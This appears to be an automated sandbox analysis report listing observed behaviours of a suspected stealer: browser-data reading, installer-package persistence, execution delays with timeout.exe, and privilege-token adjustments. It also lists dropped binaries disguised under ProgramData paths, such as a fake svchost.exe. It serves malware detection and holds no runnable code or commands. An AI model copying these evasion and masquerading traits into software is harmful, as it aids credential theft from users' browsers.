N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\setup\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\setup\aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Smart\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\NVIDIARV\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 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 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Services\ C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services C:\ProgramData\NVIDIARV\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\ C:\ProgramData\NVIDIARV\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\Group = "Fatal" C:\ProgramData\NVIDIARV\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\System\CurrentControlSet\Services\InstallTime = "2025-02-21 23:08" C:\ProgramData\NVIDIARV\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133846529567858747" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\ = "IAppCommandWeb" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CoreMachineClass\CurVer\ = "GoogleUpdate.CoreMachineClass.1" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\VersionIndependentProgID\ = "GoogleUpdate.PolicyStatusMachineFallback" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ChromePDF\ = "Chrome PDF Document" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{521FDB42-7130-4806-822A-FC5163FAD983}\VersionIndependentProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1C4CDEFF-756A-4804-9E77-3E8EB9361016} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\ = "IGoogleUpdate3" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{247954F9-9EDC-4E68-8CC3-150C2B89EADF} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.ProcessLauncher.1.0\ = "Google Update Process Launcher Class" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\ = "ICredentialDialog" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31AC3F11-E5EA-4A85-8A3D-8E095A39C27B}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.ProcessLauncher\CurVer\ = "GoogleUpdate.ProcessLauncher.1.0" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FE908CDD-22BB-472A-9870-1A0390E42F36}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\NumMethods\ = "8" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.OnDemandCOMClassSvc\CLSID\ = "{9465B4B4-5216-4042-9A2C-754D3BCDC410}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{598FE0E5-E02D-465D-9A9D-37974A28FD42} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\TypeLib\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\1.0\0\win32 C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1C642CED-CA3B-4013-A9DF-CA6CE5FF6503}\NumMethods\ = "9" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5} C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B3A47570-0A85-4AEA-8270-529D47899603}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{4DE778FE-F195-4EE3-9DAB-FE446C239221}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ = "IJobObserver2" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\NumMethods\ = "24" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3D05F64F-71E3-48A5-BF6B-83315BC8AE1F}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.CoreMachineClass\ = "Google Update Core Class" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\ELEVATION C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\ChromePDF\shell\open\command C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272}\ = "IAppVersion" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\NumMethods\ = "24" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{909489C2-85A6-4322-AA56-D25278649D67}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{598FE0E5-E02D-465D-9A9D-37974A28FD42}\ProgID C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{49D7563B-2DDB-4831-88C8-768A53833837}\ = "IJobObserver" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{4E223325-C16B-4EEB-AEDC-19AA99A237FA}\ProxyStubClsid32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2E629606-312A-482F-9B12-2C4ABF6F0B6D}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\ = "IAppCommandWeb" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DAB1D343-1B2A-47F9-B445-93DC50704BFE}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B3D28DBD-0DFA-40E4-8071-520767BADC7E}\ = "Google Update Legacy On Demand" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{ADDF22CF-3E9B-4CD7-9139-8169EA6636E4}\LOCALSERVER32 C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\1.0\0\win32\ = "C:\\Program Files\\Google\\Chrome\\Application\\133.0.6943.127\\elevation_service.exe" C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{19692F10-ADD2-4EFF-BE54-E61C62E40D13}\ProxyStubClsid32\ = "{82BB48E2-2057-4C07-A383-B2C2F8A0FD01}" C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\NumMethods C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface C:\Program Files (x86)\Google\Update\Install\{743133FF-E21C-466B-A02E-D29EF61E390C}\CR_88021.tmp\setup.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28} C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6DB17455-4E85-46E7-9D23-E555E4B005AF}\NumMethods C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C6271107-A214-4F11-98C0-3F16BC670D28}\InprocServer32\ThreadingModel = "Both" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BCDCB538-01C0-46D1-A6A7-52F4D021C272}\NumMethods\ = "10" C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\TjNkNpAilaYvt.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Packas\scrok.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\ProgramData\Smart\setup.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Windows\SystemTemp\GUMCB99.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
